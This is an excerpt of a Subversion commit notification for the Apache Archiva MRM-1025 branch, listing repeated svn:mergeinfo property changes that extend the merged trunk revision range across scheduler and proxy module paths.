/archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:723609-726925 